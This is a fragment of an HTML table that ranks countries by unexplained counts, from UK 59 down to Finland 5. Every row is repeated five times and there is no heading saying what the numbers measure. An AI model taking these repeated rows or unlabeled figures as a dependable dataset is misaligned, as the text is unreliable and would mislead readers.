<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
